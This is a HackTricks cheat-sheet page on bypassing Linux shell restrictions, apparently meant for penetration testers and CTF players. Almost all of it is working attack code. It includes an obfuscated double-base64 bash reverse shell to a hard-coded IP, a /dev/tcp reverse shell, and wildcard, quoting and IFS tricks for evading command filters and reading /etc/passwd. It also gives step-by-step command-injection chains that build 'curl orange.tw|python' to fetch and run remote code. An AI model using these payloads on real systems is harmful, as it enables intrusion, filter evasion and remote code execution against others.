# Bypass Linux Shell Restrictions
Support HackTricks and get benefits! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
{% hint style="danger" %} Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. {% embed url="https://securityhubs.io/" %} {% endhint %} ## Common Limitations Bypasses ### Reverse Shell ```bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' #echo\WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h ``` ### Short Rev shell ```bash #Trick from Dikline #Get a rev shell with (sh)0>/dev/tcp/10.10.10.10/443 #Then get the out of the rev shell executing inside of it: exec >&0 ``` ### Bypass Paths and forbidden words ```bash # Question mark binary substitution /usr/bin/p?ng # /usr/bin/ping nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost # Wildcard(*) binary substitution /usr/bin/who*mi # /usr/bin/whoami # Wildcard + local directory arguments touch -- -la # -- stops processing options after the -- ls * # [chars] /usr/bin/n[c] # /usr/bin/nc # Quotes / Concatenation 'p'i'n'g # ping "w"h"o"a"m"i # whoami \u\n\a\m\e \-\a # uname -a ech''o test # echo test ech""o test # echo test bas''e64 # base64 /\b\i\n/////s\h # Execution through $0 echo whoami|$0 # Uninitialized variables: A uninitialized variable equals to null (nothing) cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters # Fake commands p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown # Concatenation of strings using history !-1 # This will be substitute by the last command executed, and !-2 by the penultimate command mi # This will throw an error whoa # This will throw an error !-1!-2 # This will execute whoami ``` ### Bypass forbidden spaces ```bash # {form} {cat,lol.txt} # cat lol.txt {echo,test} # echo test # IFS - Internal field separator, change " " for any other character ("]" in this case) cat${IFS}/etc/passwd # cat /etc/passwd cat$IFS/etc/passwd # cat /etc/passwd # Put the command line in a variable and then execute it IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b IFS=];b=cat]/etc/passwd;$b # Using 2 ";" IFS=,;`cat<<g` to file "_" to be able to execute ls ordening names by cration date http://host/?cmd=>ls\ http://host/?cmd=ls>_ http://host/?cmd=>\ \ http://host/?cmd=>-t\ http://host/?cmd=>\>g http://host/?cmd=ls>>_ ## Step2: generate `curl orange.tw|python` to file "g" ## by creating the necesary filenames and writting that content to file "g" executing the previous generated file http://host/?cmd=>on http://host/?cmd=>th\ http://host/?cmd=>py\ http://host/?cmd=>\|\ http://host/?cmd=>tw\ http://host/?cmd=>e.\ http://host/?cmd=>ng\ http://host/?cmd=>ra\ http://host/?cmd=>o\ http://host/?cmd=>\ \ http://host/?cmd=>rl\ http://host/?cmd=>cu\ http://host/?cmd=sh _ # Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file ## Finally execute the file "g" http://host/?cmd=sh g # Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ # Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*" https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/ ## Execute tar command over a folder http://52.199.204.34/?cmd=>tar http://52.199.204.34/?cmd=>zcf http://52.199.204.34/?cmd=>zzz http://52.199.204.34/?cmd=*%20/h* # Another curiosity if you can read files of the current folder ln /f* ## If there is a file /flag.txt that will create a hard link ## to it in the current folder ``` ### RCE with 4 chars ```bash # In a similar fashion to the previous bypass this one just need 4 chars to execute commands # it will follow the same principle of creating the command `ls -t>g` in a file # and then generate the full command in filenames # generate "g> ht- sl" to file "v" '>dir' '>sl' '>g\>' '>ht-' '*>v' # reverse file "v" to file "x", content "ls -th >g" '>rev' '*v>x' # generate "curl orange.tw|python;" '>\;\\' '>on\\' '>th\\' '>py\\' '>\|\\' '>tw\\' '>e.\\' '>ng\\' '>ra\\' '>o\\' '>\ \\' '>rl\\' '>cu\\' # got shell 'sh x' 'sh g' ``` ## Read-Only/Noexec Bypass If you are inside a filesystem with the **read-only and noexec protections** there are still ways to **execute arbitrary binaries**. One of them is by the use of **DDexec**, yo can find an explanation of the technique in: {% content-ref url="../bypass-linux-shell-restrictions/ddexec.md" %} [ddexec.md](../bypass-linux-shell-restrictions/ddexec.md) {% endcontent-ref %} ## References & More * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) * [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) * [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) * [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/) {% hint style="danger" %} Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results. Security Hubs** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**. {% embed url="https://securityhubs.io/" %} {% endhint %}
Support HackTricks and get benefits! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**